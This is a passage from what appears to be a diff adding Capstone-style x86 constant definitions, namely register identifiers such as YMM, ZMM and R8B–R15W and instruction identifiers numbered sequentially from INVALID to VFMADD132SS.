= 162 + X86_REG_YMM9 = 163 + X86_REG_YMM10 = 164 + X86_REG_YMM11 = 165 + X86_REG_YMM12 = 166 + X86_REG_YMM13 = 167 + X86_REG_YMM14 = 168 + X86_REG_YMM15 = 169 + X86_REG_YMM16 = 170 + X86_REG_YMM17 = 171 + X86_REG_YMM18 = 172 + X86_REG_YMM19 = 173 + X86_REG_YMM20 = 174 + X86_REG_YMM21 = 175 + X86_REG_YMM22 = 176 + X86_REG_YMM23 = 177 + X86_REG_YMM24 = 178 + X86_REG_YMM25 = 179 + X86_REG_YMM26 = 180 + X86_REG_YMM27 = 181 + X86_REG_YMM28 = 182 + X86_REG_YMM29 = 183 + X86_REG_YMM30 = 184 + X86_REG_YMM31 = 185 + X86_REG_ZMM0 = 186 + X86_REG_ZMM1 = 187 + X86_REG_ZMM2 = 188 + X86_REG_ZMM3 = 189 + X86_REG_ZMM4 = 190 + X86_REG_ZMM5 = 191 + X86_REG_ZMM6 = 192 + X86_REG_ZMM7 = 193 + X86_REG_ZMM8 = 194 + X86_REG_ZMM9 = 195 + X86_REG_ZMM10 = 196 + X86_REG_ZMM11 = 197 + X86_REG_ZMM12 = 198 + X86_REG_ZMM13 = 199 + X86_REG_ZMM14 = 200 + X86_REG_ZMM15 = 201 + X86_REG_ZMM16 = 202 + X86_REG_ZMM17 = 203 + X86_REG_ZMM18 = 204 + X86_REG_ZMM19 = 205 + X86_REG_ZMM20 = 206 + X86_REG_ZMM21 = 207 + X86_REG_ZMM22 = 208 + X86_REG_ZMM23 = 209 + X86_REG_ZMM24 = 210 + X86_REG_ZMM25 = 211 + X86_REG_ZMM26 = 212 + X86_REG_ZMM27 = 213 + X86_REG_ZMM28 = 214 + X86_REG_ZMM29 = 215 + X86_REG_ZMM30 = 216 + X86_REG_ZMM31 = 217 + X86_REG_R8B = 218 + X86_REG_R9B = 219 + X86_REG_R10B = 220 + X86_REG_R11B = 221 + X86_REG_R12B = 222 + X86_REG_R13B = 223 + X86_REG_R14B = 224 + X86_REG_R15B = 225 + X86_REG_R8D = 226 + X86_REG_R9D = 227 + X86_REG_R10D = 228 + X86_REG_R11D = 229 + X86_REG_R12D = 230 + X86_REG_R13D = 231 + X86_REG_R14D = 232 + X86_REG_R15D = 233 + X86_REG_R8W = 234 + X86_REG_R9W = 235 + X86_REG_R10W = 236 + X86_REG_R11W = 237 + X86_REG_R12W = 238 + X86_REG_R13W = 239 + X86_REG_R14W = 240 + X86_REG_R15W = 241 + X86_REG_IDTR = 242 + X86_REG_GDTR = 243 + X86_REG_LDTR = 244 + X86_REG_TR = 245 + X86_REG_FPCW = 246 + X86_REG_FPTAG = 247 + X86_REG_MSR = 248 + X86_REG_MXCSR = 249 + X86_REG_FS_BASE = 250 + X86_REG_GS_BASE = 251 + X86_REG_ENDING = 252 + +// X86 instructions + + X86_INS_INVALID = 0 + X86_INS_AAA = 1 + X86_INS_AAD = 2 + X86_INS_AAM = 3 + X86_INS_AAS = 4 + X86_INS_FABS = 5 + X86_INS_ADC = 6 + X86_INS_ADCX = 7 + X86_INS_ADD = 8 + X86_INS_ADDPD = 9 + X86_INS_ADDPS = 10 + X86_INS_ADDSD = 11 + X86_INS_ADDSS = 12 + X86_INS_ADDSUBPD = 13 + X86_INS_ADDSUBPS = 14 + X86_INS_FADD = 15 + X86_INS_FIADD = 16 + X86_INS_FADDP = 17 + X86_INS_ADOX = 18 + X86_INS_AESDECLAST = 19 + X86_INS_AESDEC = 20 + X86_INS_AESENCLAST = 21 + X86_INS_AESENC = 22 + X86_INS_AESIMC = 23 + X86_INS_AESKEYGENASSIST = 24 + X86_INS_AND = 25 + X86_INS_ANDN = 26 + X86_INS_ANDNPD = 27 + X86_INS_ANDNPS = 28 + X86_INS_ANDPD = 29 + X86_INS_ANDPS = 30 + X86_INS_ARPL = 31 + X86_INS_BEXTR = 32 + X86_INS_BLCFILL = 33 + X86_INS_BLCI = 34 + X86_INS_BLCIC = 35 + X86_INS_BLCMSK = 36 + X86_INS_BLCS = 37 + X86_INS_BLENDPD = 38 + X86_INS_BLENDPS = 39 + X86_INS_BLENDVPD = 40 + X86_INS_BLENDVPS = 41 + X86_INS_BLSFILL = 42 + X86_INS_BLSI = 43 + X86_INS_BLSIC = 44 + X86_INS_BLSMSK = 45 + X86_INS_BLSR = 46 + X86_INS_BOUND = 47 + X86_INS_BSF = 48 + X86_INS_BSR = 49 + X86_INS_BSWAP = 50 + X86_INS_BT = 51 + X86_INS_BTC = 52 + X86_INS_BTR = 53 + X86_INS_BTS = 54 + X86_INS_BZHI = 55 + X86_INS_CALL = 56 + X86_INS_CBW = 57 + X86_INS_CDQ = 58 + X86_INS_CDQE = 59 + X86_INS_FCHS = 60 + X86_INS_CLAC = 61 + X86_INS_CLC = 62 + X86_INS_CLD = 63 + X86_INS_CLFLUSH = 64 + X86_INS_CLFLUSHOPT = 65 + X86_INS_CLGI = 66 + X86_INS_CLI = 67 + X86_INS_CLTS = 68 + X86_INS_CLWB = 69 + X86_INS_CMC = 70 + X86_INS_CMOVA = 71 + X86_INS_CMOVAE = 72 + X86_INS_CMOVB = 73 + X86_INS_CMOVBE = 74 + X86_INS_FCMOVBE = 75 + X86_INS_FCMOVB = 76 + X86_INS_CMOVE = 77 + X86_INS_FCMOVE = 78 + X86_INS_CMOVG = 79 + X86_INS_CMOVGE = 80 + X86_INS_CMOVL = 81 + X86_INS_CMOVLE = 82 + X86_INS_FCMOVNBE = 83 + X86_INS_FCMOVNB = 84 + X86_INS_CMOVNE = 85 + X86_INS_FCMOVNE = 86 + X86_INS_CMOVNO = 87 + X86_INS_CMOVNP = 88 + X86_INS_FCMOVNU = 89 + X86_INS_CMOVNS = 90 + X86_INS_CMOVO = 91 + X86_INS_CMOVP = 92 + X86_INS_FCMOVU = 93 + X86_INS_CMOVS = 94 + X86_INS_CMP = 95 + X86_INS_CMPPD = 96 + X86_INS_CMPPS = 97 + X86_INS_CMPSB = 98 + X86_INS_CMPSD = 99 + X86_INS_CMPSQ = 100 + X86_INS_CMPSS = 101 + X86_INS_CMPSW = 102 + X86_INS_CMPXCHG16B = 103 + X86_INS_CMPXCHG = 104 + X86_INS_CMPXCHG8B = 105 + X86_INS_COMISD = 106 + X86_INS_COMISS = 107 + X86_INS_FCOMP = 108 + X86_INS_FCOMPI = 109 + X86_INS_FCOMI = 110 + X86_INS_FCOM = 111 + X86_INS_FCOS = 112 + X86_INS_CPUID = 113 + X86_INS_CQO = 114 + X86_INS_CRC32 = 115 + X86_INS_CVTDQ2PD = 116 + X86_INS_CVTDQ2PS = 117 + X86_INS_CVTPD2DQ = 118 + X86_INS_CVTPD2PS = 119 + X86_INS_CVTPS2DQ = 120 + X86_INS_CVTPS2PD = 121 + X86_INS_CVTSD2SI = 122 + X86_INS_CVTSD2SS = 123 + X86_INS_CVTSI2SD = 124 + X86_INS_CVTSI2SS = 125 + X86_INS_CVTSS2SD = 126 + X86_INS_CVTSS2SI = 127 + X86_INS_CVTTPD2DQ = 128 + X86_INS_CVTTPS2DQ = 129 + X86_INS_CVTTSD2SI = 130 + X86_INS_CVTTSS2SI = 131 + X86_INS_CWD = 132 + X86_INS_CWDE = 133 + X86_INS_DAA = 134 + X86_INS_DAS = 135 + X86_INS_DATA16 = 136 + X86_INS_DEC = 137 + X86_INS_DIV = 138 + X86_INS_DIVPD = 139 + X86_INS_DIVPS = 140 + X86_INS_FDIVR = 141 + X86_INS_FIDIVR = 142 + X86_INS_FDIVRP = 143 + X86_INS_DIVSD = 144 + X86_INS_DIVSS = 145 + X86_INS_FDIV = 146 + X86_INS_FIDIV = 147 + X86_INS_FDIVP = 148 + X86_INS_DPPD = 149 + X86_INS_DPPS = 150 + X86_INS_RET = 151 + X86_INS_ENCLS = 152 + X86_INS_ENCLU = 153 + X86_INS_ENTER = 154 + X86_INS_EXTRACTPS = 155 + X86_INS_EXTRQ = 156 + X86_INS_F2XM1 = 157 + X86_INS_LCALL = 158 + X86_INS_LJMP = 159 + X86_INS_FBLD = 160 + X86_INS_FBSTP = 161 + X86_INS_FCOMPP = 162 + X86_INS_FDECSTP = 163 + X86_INS_FEMMS = 164 + X86_INS_FFREE = 165 + X86_INS_FICOM = 166 + X86_INS_FICOMP = 167 + X86_INS_FINCSTP = 168 + X86_INS_FLDCW = 169 + X86_INS_FLDENV = 170 + X86_INS_FLDL2E = 171 + X86_INS_FLDL2T = 172 + X86_INS_FLDLG2 = 173 + X86_INS_FLDLN2 = 174 + X86_INS_FLDPI = 175 + X86_INS_FNCLEX = 176 + X86_INS_FNINIT = 177 + X86_INS_FNOP = 178 + X86_INS_FNSTCW = 179 + X86_INS_FNSTSW = 180 + X86_INS_FPATAN = 181 + X86_INS_FPREM = 182 + X86_INS_FPREM1 = 183 + X86_INS_FPTAN = 184 + X86_INS_FFREEP = 185 + X86_INS_FRNDINT = 186 + X86_INS_FRSTOR = 187 + X86_INS_FNSAVE = 188 + X86_INS_FSCALE = 189 + X86_INS_FSETPM = 190 + X86_INS_FSINCOS = 191 + X86_INS_FNSTENV = 192 + X86_INS_FXAM = 193 + X86_INS_FXRSTOR = 194 + X86_INS_FXRSTOR64 = 195 + X86_INS_FXSAVE = 196 + X86_INS_FXSAVE64 = 197 + X86_INS_FXTRACT = 198 + X86_INS_FYL2X = 199 + X86_INS_FYL2XP1 = 200 + X86_INS_MOVAPD = 201 + X86_INS_MOVAPS = 202 + X86_INS_ORPD = 203 + X86_INS_ORPS = 204 + X86_INS_VMOVAPD = 205 + X86_INS_VMOVAPS = 206 + X86_INS_XORPD = 207 + X86_INS_XORPS = 208 + X86_INS_GETSEC = 209 + X86_INS_HADDPD = 210 + X86_INS_HADDPS = 211 + X86_INS_HLT = 212 + X86_INS_HSUBPD = 213 + X86_INS_HSUBPS = 214 + X86_INS_IDIV = 215 + X86_INS_FILD = 216 + X86_INS_IMUL = 217 + X86_INS_IN = 218 + X86_INS_INC = 219 + X86_INS_INSB = 220 + X86_INS_INSERTPS = 221 + X86_INS_INSERTQ = 222 + X86_INS_INSD = 223 + X86_INS_INSW = 224 + X86_INS_INT = 225 + X86_INS_INT1 = 226 + X86_INS_INT3 = 227 + X86_INS_INTO = 228 + X86_INS_INVD = 229 + X86_INS_INVEPT = 230 + X86_INS_INVLPG = 231 + X86_INS_INVLPGA = 232 + X86_INS_INVPCID = 233 + X86_INS_INVVPID = 234 + X86_INS_IRET = 235 + X86_INS_IRETD = 236 + X86_INS_IRETQ = 237 + X86_INS_FISTTP = 238 + X86_INS_FIST = 239 + X86_INS_FISTP = 240 + X86_INS_UCOMISD = 241 + X86_INS_UCOMISS = 242 + X86_INS_VCOMISD = 243 + X86_INS_VCOMISS = 244 + X86_INS_VCVTSD2SS = 245 + X86_INS_VCVTSI2SD = 246 + X86_INS_VCVTSI2SS = 247 + X86_INS_VCVTSS2SD = 248 + X86_INS_VCVTTSD2SI = 249 + X86_INS_VCVTTSD2USI = 250 + X86_INS_VCVTTSS2SI = 251 + X86_INS_VCVTTSS2USI = 252 + X86_INS_VCVTUSI2SD = 253 + X86_INS_VCVTUSI2SS = 254 + X86_INS_VUCOMISD = 255 + X86_INS_VUCOMISS = 256 + X86_INS_JAE = 257 + X86_INS_JA = 258 + X86_INS_JBE = 259 + X86_INS_JB = 260 + X86_INS_JCXZ = 261 + X86_INS_JECXZ = 262 + X86_INS_JE = 263 + X86_INS_JGE = 264 + X86_INS_JG = 265 + X86_INS_JLE = 266 + X86_INS_JL = 267 + X86_INS_JMP = 268 + X86_INS_JNE = 269 + X86_INS_JNO = 270 + X86_INS_JNP = 271 + X86_INS_JNS = 272 + X86_INS_JO = 273 + X86_INS_JP = 274 + X86_INS_JRCXZ = 275 + X86_INS_JS = 276 + X86_INS_KANDB = 277 + X86_INS_KANDD = 278 + X86_INS_KANDNB = 279 + X86_INS_KANDND = 280 + X86_INS_KANDNQ = 281 + X86_INS_KANDNW = 282 + X86_INS_KANDQ = 283 + X86_INS_KANDW = 284 + X86_INS_KMOVB = 285 + X86_INS_KMOVD = 286 + X86_INS_KMOVQ = 287 + X86_INS_KMOVW = 288 + X86_INS_KNOTB = 289 + X86_INS_KNOTD = 290 + X86_INS_KNOTQ = 291 + X86_INS_KNOTW = 292 + X86_INS_KORB = 293 + X86_INS_KORD = 294 + X86_INS_KORQ = 295 + X86_INS_KORTESTB = 296 + X86_INS_KORTESTD = 297 + X86_INS_KORTESTQ = 298 + X86_INS_KORTESTW = 299 + X86_INS_KORW = 300 + X86_INS_KSHIFTLB = 301 + X86_INS_KSHIFTLD = 302 + X86_INS_KSHIFTLQ = 303 + X86_INS_KSHIFTLW = 304 + X86_INS_KSHIFTRB = 305 + X86_INS_KSHIFTRD = 306 + X86_INS_KSHIFTRQ = 307 + X86_INS_KSHIFTRW = 308 + X86_INS_KUNPCKBW = 309 + X86_INS_KXNORB = 310 + X86_INS_KXNORD = 311 + X86_INS_KXNORQ = 312 + X86_INS_KXNORW = 313 + X86_INS_KXORB = 314 + X86_INS_KXORD = 315 + X86_INS_KXORQ = 316 + X86_INS_KXORW = 317 + X86_INS_LAHF = 318 + X86_INS_LAR = 319 + X86_INS_LDDQU = 320 + X86_INS_LDMXCSR = 321 + X86_INS_LDS = 322 + X86_INS_FLDZ = 323 + X86_INS_FLD1 = 324 + X86_INS_FLD = 325 + X86_INS_LEA = 326 + X86_INS_LEAVE = 327 + X86_INS_LES = 328 + X86_INS_LFENCE = 329 + X86_INS_LFS = 330 + X86_INS_LGDT = 331 + X86_INS_LGS = 332 + X86_INS_LIDT = 333 + X86_INS_LLDT = 334 + X86_INS_LMSW = 335 + X86_INS_OR = 336 + X86_INS_SUB = 337 + X86_INS_XOR = 338 + X86_INS_LODSB = 339 + X86_INS_LODSD = 340 + X86_INS_LODSQ = 341 + X86_INS_LODSW = 342 + X86_INS_LOOP = 343 + X86_INS_LOOPE = 344 + X86_INS_LOOPNE = 345 + X86_INS_RETF = 346 + X86_INS_RETFQ = 347 + X86_INS_LSL = 348 + X86_INS_LSS = 349 + X86_INS_LTR = 350 + X86_INS_XADD = 351 + X86_INS_LZCNT = 352 + X86_INS_MASKMOVDQU = 353 + X86_INS_MAXPD = 354 + X86_INS_MAXPS = 355 + X86_INS_MAXSD = 356 + X86_INS_MAXSS = 357 + X86_INS_MFENCE = 358 + X86_INS_MINPD = 359 + X86_INS_MINPS = 360 + X86_INS_MINSD = 361 + X86_INS_MINSS = 362 + X86_INS_CVTPD2PI = 363 + X86_INS_CVTPI2PD = 364 + X86_INS_CVTPI2PS = 365 + X86_INS_CVTPS2PI = 366 + X86_INS_CVTTPD2PI = 367 + X86_INS_CVTTPS2PI = 368 + X86_INS_EMMS = 369 + X86_INS_MASKMOVQ = 370 + X86_INS_MOVD = 371 + X86_INS_MOVDQ2Q = 372 + X86_INS_MOVNTQ = 373 + X86_INS_MOVQ2DQ = 374 + X86_INS_MOVQ = 375 + X86_INS_PABSB = 376 + X86_INS_PABSD = 377 + X86_INS_PABSW = 378 + X86_INS_PACKSSDW = 379 + X86_INS_PACKSSWB = 380 + X86_INS_PACKUSWB = 381 + X86_INS_PADDB = 382 + X86_INS_PADDD = 383 + X86_INS_PADDQ = 384 + X86_INS_PADDSB = 385 + X86_INS_PADDSW = 386 + X86_INS_PADDUSB = 387 + X86_INS_PADDUSW = 388 + X86_INS_PADDW = 389 + X86_INS_PALIGNR = 390 + X86_INS_PANDN = 391 + X86_INS_PAND = 392 + X86_INS_PAVGB = 393 + X86_INS_PAVGW = 394 + X86_INS_PCMPEQB = 395 + X86_INS_PCMPEQD = 396 + X86_INS_PCMPEQW = 397 + X86_INS_PCMPGTB = 398 + X86_INS_PCMPGTD = 399 + X86_INS_PCMPGTW = 400 + X86_INS_PEXTRW = 401 + X86_INS_PHADDSW = 402 + X86_INS_PHADDW = 403 + X86_INS_PHADDD = 404 + X86_INS_PHSUBD = 405 + X86_INS_PHSUBSW = 406 + X86_INS_PHSUBW = 407 + X86_INS_PINSRW = 408 + X86_INS_PMADDUBSW = 409 + X86_INS_PMADDWD = 410 + X86_INS_PMAXSW = 411 + X86_INS_PMAXUB = 412 + X86_INS_PMINSW = 413 + X86_INS_PMINUB = 414 + X86_INS_PMOVMSKB = 415 + X86_INS_PMULHRSW = 416 + X86_INS_PMULHUW = 417 + X86_INS_PMULHW = 418 + X86_INS_PMULLW = 419 + X86_INS_PMULUDQ = 420 + X86_INS_POR = 421 + X86_INS_PSADBW = 422 + X86_INS_PSHUFB = 423 + X86_INS_PSHUFW = 424 + X86_INS_PSIGNB = 425 + X86_INS_PSIGND = 426 + X86_INS_PSIGNW = 427 + X86_INS_PSLLD = 428 + X86_INS_PSLLQ = 429 + X86_INS_PSLLW = 430 + X86_INS_PSRAD = 431 + X86_INS_PSRAW = 432 + X86_INS_PSRLD = 433 + X86_INS_PSRLQ = 434 + X86_INS_PSRLW = 435 + X86_INS_PSUBB = 436 + X86_INS_PSUBD = 437 + X86_INS_PSUBQ = 438 + X86_INS_PSUBSB = 439 + X86_INS_PSUBSW = 440 + X86_INS_PSUBUSB = 441 + X86_INS_PSUBUSW = 442 + X86_INS_PSUBW = 443 + X86_INS_PUNPCKHBW = 444 + X86_INS_PUNPCKHDQ = 445 + X86_INS_PUNPCKHWD = 446 + X86_INS_PUNPCKLBW = 447 + X86_INS_PUNPCKLDQ = 448 + X86_INS_PUNPCKLWD = 449 + X86_INS_PXOR = 450 + X86_INS_MONITOR = 451 + X86_INS_MONTMUL = 452 + X86_INS_MOV = 453 + X86_INS_MOVABS = 454 + X86_INS_MOVBE = 455 + X86_INS_MOVDDUP = 456 + X86_INS_MOVDQA = 457 + X86_INS_MOVDQU = 458 + X86_INS_MOVHLPS = 459 + X86_INS_MOVHPD = 460 + X86_INS_MOVHPS = 461 + X86_INS_MOVLHPS = 462 + X86_INS_MOVLPD = 463 + X86_INS_MOVLPS = 464 + X86_INS_MOVMSKPD = 465 + X86_INS_MOVMSKPS = 466 + X86_INS_MOVNTDQA = 467 + X86_INS_MOVNTDQ = 468 + X86_INS_MOVNTI = 469 + X86_INS_MOVNTPD = 470 + X86_INS_MOVNTPS = 471 + X86_INS_MOVNTSD = 472 + X86_INS_MOVNTSS = 473 + X86_INS_MOVSB = 474 + X86_INS_MOVSD = 475 + X86_INS_MOVSHDUP = 476 + X86_INS_MOVSLDUP = 477 + X86_INS_MOVSQ = 478 + X86_INS_MOVSS = 479 + X86_INS_MOVSW = 480 + X86_INS_MOVSX = 481 + X86_INS_MOVSXD = 482 + X86_INS_MOVUPD = 483 + X86_INS_MOVUPS = 484 + X86_INS_MOVZX = 485 + X86_INS_MPSADBW = 486 + X86_INS_MUL = 487 + X86_INS_MULPD = 488 + X86_INS_MULPS = 489 + X86_INS_MULSD = 490 + X86_INS_MULSS = 491 + X86_INS_MULX = 492 + X86_INS_FMUL = 493 + X86_INS_FIMUL = 494 + X86_INS_FMULP = 495 + X86_INS_MWAIT = 496 + X86_INS_NEG = 497 + X86_INS_NOP = 498 + X86_INS_NOT = 499 + X86_INS_OUT = 500 + X86_INS_OUTSB = 501 + X86_INS_OUTSD = 502 + X86_INS_OUTSW = 503 + X86_INS_PACKUSDW = 504 + X86_INS_PAUSE = 505 + X86_INS_PAVGUSB = 506 + X86_INS_PBLENDVB = 507 + X86_INS_PBLENDW = 508 + X86_INS_PCLMULQDQ = 509 + X86_INS_PCMPEQQ = 510 + X86_INS_PCMPESTRI = 511 + X86_INS_PCMPESTRM = 512 + X86_INS_PCMPGTQ = 513 + X86_INS_PCMPISTRI = 514 + X86_INS_PCMPISTRM = 515 + X86_INS_PCOMMIT = 516 + X86_INS_PDEP = 517 + X86_INS_PEXT = 518 + X86_INS_PEXTRB = 519 + X86_INS_PEXTRD = 520 + X86_INS_PEXTRQ = 521 + X86_INS_PF2ID = 522 + X86_INS_PF2IW = 523 + X86_INS_PFACC = 524 + X86_INS_PFADD = 525 + X86_INS_PFCMPEQ = 526 + X86_INS_PFCMPGE = 527 + X86_INS_PFCMPGT = 528 + X86_INS_PFMAX = 529 + X86_INS_PFMIN = 530 + X86_INS_PFMUL = 531 + X86_INS_PFNACC = 532 + X86_INS_PFPNACC = 533 + X86_INS_PFRCPIT1 = 534 + X86_INS_PFRCPIT2 = 535 + X86_INS_PFRCP = 536 + X86_INS_PFRSQIT1 = 537 + X86_INS_PFRSQRT = 538 + X86_INS_PFSUBR = 539 + X86_INS_PFSUB = 540 + X86_INS_PHMINPOSUW = 541 + X86_INS_PI2FD = 542 + X86_INS_PI2FW = 543 + X86_INS_PINSRB = 544 + X86_INS_PINSRD = 545 + X86_INS_PINSRQ = 546 + X86_INS_PMAXSB = 547 + X86_INS_PMAXSD = 548 + X86_INS_PMAXUD = 549 + X86_INS_PMAXUW = 550 + X86_INS_PMINSB = 551 + X86_INS_PMINSD = 552 + X86_INS_PMINUD = 553 + X86_INS_PMINUW = 554 + X86_INS_PMOVSXBD = 555 + X86_INS_PMOVSXBQ = 556 + X86_INS_PMOVSXBW = 557 + X86_INS_PMOVSXDQ = 558 + X86_INS_PMOVSXWD = 559 + X86_INS_PMOVSXWQ = 560 + X86_INS_PMOVZXBD = 561 + X86_INS_PMOVZXBQ = 562 + X86_INS_PMOVZXBW = 563 + X86_INS_PMOVZXDQ = 564 + X86_INS_PMOVZXWD = 565 + X86_INS_PMOVZXWQ = 566 + X86_INS_PMULDQ = 567 + X86_INS_PMULHRW = 568 + X86_INS_PMULLD = 569 + X86_INS_POP = 570 + X86_INS_POPAW = 571 + X86_INS_POPAL = 572 + X86_INS_POPCNT = 573 + X86_INS_POPF = 574 + X86_INS_POPFD = 575 + X86_INS_POPFQ = 576 + X86_INS_PREFETCH = 577 + X86_INS_PREFETCHNTA = 578 + X86_INS_PREFETCHT0 = 579 + X86_INS_PREFETCHT1 = 580 + X86_INS_PREFETCHT2 = 581 + X86_INS_PREFETCHW = 582 + X86_INS_PSHUFD = 583 + X86_INS_PSHUFHW = 584 + X86_INS_PSHUFLW = 585 + X86_INS_PSLLDQ = 586 + X86_INS_PSRLDQ = 587 + X86_INS_PSWAPD = 588 + X86_INS_PTEST = 589 + X86_INS_PUNPCKHQDQ = 590 + X86_INS_PUNPCKLQDQ = 591 + X86_INS_PUSH = 592 + X86_INS_PUSHAW = 593 + X86_INS_PUSHAL = 594 + X86_INS_PUSHF = 595 + X86_INS_PUSHFD = 596 + X86_INS_PUSHFQ = 597 + X86_INS_RCL = 598 + X86_INS_RCPPS = 599 + X86_INS_RCPSS = 600 + X86_INS_RCR = 601 + X86_INS_RDFSBASE = 602 + X86_INS_RDGSBASE = 603 + X86_INS_RDMSR = 604 + X86_INS_RDPMC = 605 + X86_INS_RDRAND = 606 + X86_INS_RDSEED = 607 + X86_INS_RDTSC = 608 + X86_INS_RDTSCP = 609 + X86_INS_ROL = 610 + X86_INS_ROR = 611 + X86_INS_RORX = 612 + X86_INS_ROUNDPD = 613 + X86_INS_ROUNDPS = 614 + X86_INS_ROUNDSD = 615 + X86_INS_ROUNDSS = 616 + X86_INS_RSM = 617 + X86_INS_RSQRTPS = 618 + X86_INS_RSQRTSS = 619 + X86_INS_SAHF = 620 + X86_INS_SAL = 621 + X86_INS_SALC = 622 + X86_INS_SAR = 623 + X86_INS_SARX = 624 + X86_INS_SBB = 625 + X86_INS_SCASB = 626 + X86_INS_SCASD = 627 + X86_INS_SCASQ = 628 + X86_INS_SCASW = 629 + X86_INS_SETAE = 630 + X86_INS_SETA = 631 + X86_INS_SETBE = 632 + X86_INS_SETB = 633 + X86_INS_SETE = 634 + X86_INS_SETGE = 635 + X86_INS_SETG = 636 + X86_INS_SETLE = 637 + X86_INS_SETL = 638 + X86_INS_SETNE = 639 + X86_INS_SETNO = 640 + X86_INS_SETNP = 641 + X86_INS_SETNS = 642 + X86_INS_SETO = 643 + X86_INS_SETP = 644 + X86_INS_SETS = 645 + X86_INS_SFENCE = 646 + X86_INS_SGDT = 647 + X86_INS_SHA1MSG1 = 648 + X86_INS_SHA1MSG2 = 649 + X86_INS_SHA1NEXTE = 650 + X86_INS_SHA1RNDS4 = 651 + X86_INS_SHA256MSG1 = 652 + X86_INS_SHA256MSG2 = 653 + X86_INS_SHA256RNDS2 = 654 + X86_INS_SHL = 655 + X86_INS_SHLD = 656 + X86_INS_SHLX = 657 + X86_INS_SHR = 658 + X86_INS_SHRD = 659 + X86_INS_SHRX = 660 + X86_INS_SHUFPD = 661 + X86_INS_SHUFPS = 662 + X86_INS_SIDT = 663 + X86_INS_FSIN = 664 + X86_INS_SKINIT = 665 + X86_INS_SLDT = 666 + X86_INS_SMSW = 667 + X86_INS_SQRTPD = 668 + X86_INS_SQRTPS = 669 + X86_INS_SQRTSD = 670 + X86_INS_SQRTSS = 671 + X86_INS_FSQRT = 672 + X86_INS_STAC = 673 + X86_INS_STC = 674 + X86_INS_STD = 675 + X86_INS_STGI = 676 + X86_INS_STI = 677 + X86_INS_STMXCSR = 678 + X86_INS_STOSB = 679 + X86_INS_STOSD = 680 + X86_INS_STOSQ = 681 + X86_INS_STOSW = 682 + X86_INS_STR = 683 + X86_INS_FST = 684 + X86_INS_FSTP = 685 + X86_INS_FSTPNCE = 686 + X86_INS_FXCH = 687 + X86_INS_SUBPD = 688 + X86_INS_SUBPS = 689 + X86_INS_FSUBR = 690 + X86_INS_FISUBR = 691 + X86_INS_FSUBRP = 692 + X86_INS_SUBSD = 693 + X86_INS_SUBSS = 694 + X86_INS_FSUB = 695 + X86_INS_FISUB = 696 + X86_INS_FSUBP = 697 + X86_INS_SWAPGS = 698 + X86_INS_SYSCALL = 699 + X86_INS_SYSENTER = 700 + X86_INS_SYSEXIT = 701 + X86_INS_SYSRET = 702 + X86_INS_T1MSKC = 703 + X86_INS_TEST = 704 + X86_INS_UD2 = 705 + X86_INS_FTST = 706 + X86_INS_TZCNT = 707 + X86_INS_TZMSK = 708 + X86_INS_FUCOMPI = 709 + X86_INS_FUCOMI = 710 + X86_INS_FUCOMPP = 711 + X86_INS_FUCOMP = 712 + X86_INS_FUCOM = 713 + X86_INS_UD2B = 714 + X86_INS_UNPCKHPD = 715 + X86_INS_UNPCKHPS = 716 + X86_INS_UNPCKLPD = 717 + X86_INS_UNPCKLPS = 718 + X86_INS_VADDPD = 719 + X86_INS_VADDPS = 720 + X86_INS_VADDSD = 721 + X86_INS_VADDSS = 722 + X86_INS_VADDSUBPD = 723 + X86_INS_VADDSUBPS = 724 + X86_INS_VAESDECLAST = 725 + X86_INS_VAESDEC = 726 + X86_INS_VAESENCLAST = 727 + X86_INS_VAESENC = 728 + X86_INS_VAESIMC = 729 + X86_INS_VAESKEYGENASSIST = 730 + X86_INS_VALIGND = 731 + X86_INS_VALIGNQ = 732 + X86_INS_VANDNPD = 733 + X86_INS_VANDNPS = 734 + X86_INS_VANDPD = 735 + X86_INS_VANDPS = 736 + X86_INS_VBLENDMPD = 737 + X86_INS_VBLENDMPS = 738 + X86_INS_VBLENDPD = 739 + X86_INS_VBLENDPS = 740 + X86_INS_VBLENDVPD = 741 + X86_INS_VBLENDVPS = 742 + X86_INS_VBROADCASTF128 = 743 + X86_INS_VBROADCASTI32X4 = 744 + X86_INS_VBROADCASTI64X4 = 745 + X86_INS_VBROADCASTSD = 746 + X86_INS_VBROADCASTSS = 747 + X86_INS_VCMPPD = 748 + X86_INS_VCMPPS = 749 + X86_INS_VCMPSD = 750 + X86_INS_VCMPSS = 751 + X86_INS_VCOMPRESSPD = 752 + X86_INS_VCOMPRESSPS = 753 + X86_INS_VCVTDQ2PD = 754 + X86_INS_VCVTDQ2PS = 755 + X86_INS_VCVTPD2DQX = 756 + X86_INS_VCVTPD2DQ = 757 + X86_INS_VCVTPD2PSX = 758 + X86_INS_VCVTPD2PS = 759 + X86_INS_VCVTPD2UDQ = 760 + X86_INS_VCVTPH2PS = 761 + X86_INS_VCVTPS2DQ = 762 + X86_INS_VCVTPS2PD = 763 + X86_INS_VCVTPS2PH = 764 + X86_INS_VCVTPS2UDQ = 765 + X86_INS_VCVTSD2SI = 766 + X86_INS_VCVTSD2USI = 767 + X86_INS_VCVTSS2SI = 768 + X86_INS_VCVTSS2USI = 769 + X86_INS_VCVTTPD2DQX = 770 + X86_INS_VCVTTPD2DQ = 771 + X86_INS_VCVTTPD2UDQ = 772 + X86_INS_VCVTTPS2DQ = 773 + X86_INS_VCVTTPS2UDQ = 774 + X86_INS_VCVTUDQ2PD = 775 + X86_INS_VCVTUDQ2PS = 776 + X86_INS_VDIVPD = 777 + X86_INS_VDIVPS = 778 + X86_INS_VDIVSD = 779 + X86_INS_VDIVSS = 780 + X86_INS_VDPPD = 781 + X86_INS_VDPPS = 782 + X86_INS_VERR = 783 + X86_INS_VERW = 784 + X86_INS_VEXP2PD = 785 + X86_INS_VEXP2PS = 786 + X86_INS_VEXPANDPD = 787 + X86_INS_VEXPANDPS = 788 + X86_INS_VEXTRACTF128 = 789 + X86_INS_VEXTRACTF32X4 = 790 + X86_INS_VEXTRACTF64X4 = 791 + X86_INS_VEXTRACTI128 = 792 + X86_INS_VEXTRACTI32X4 = 793 + X86_INS_VEXTRACTI64X4 = 794 + X86_INS_VEXTRACTPS = 795 + X86_INS_VFMADD132PD = 796 + X86_INS_VFMADD132PS = 797 + X86_INS_VFMADDPD = 798 + X86_INS_VFMADD213PD = 799 + X86_INS_VFMADD231PD = 800 + X86_INS_VFMADDPS = 801 + X86_INS_VFMADD213PS = 802 + X86_INS_VFMADD231PS = 803 + X86_INS_VFMADDSD = 804 + X86_INS_VFMADD213SD = 805 + X86_INS_VFMADD132SD = 806 + X86_INS_VFMADD231SD = 807 + X86_INS_VFMADDSS = 808 + X86_INS_VFMADD213SS = 809 + X86_INS_VFMADD132SS = 810 + 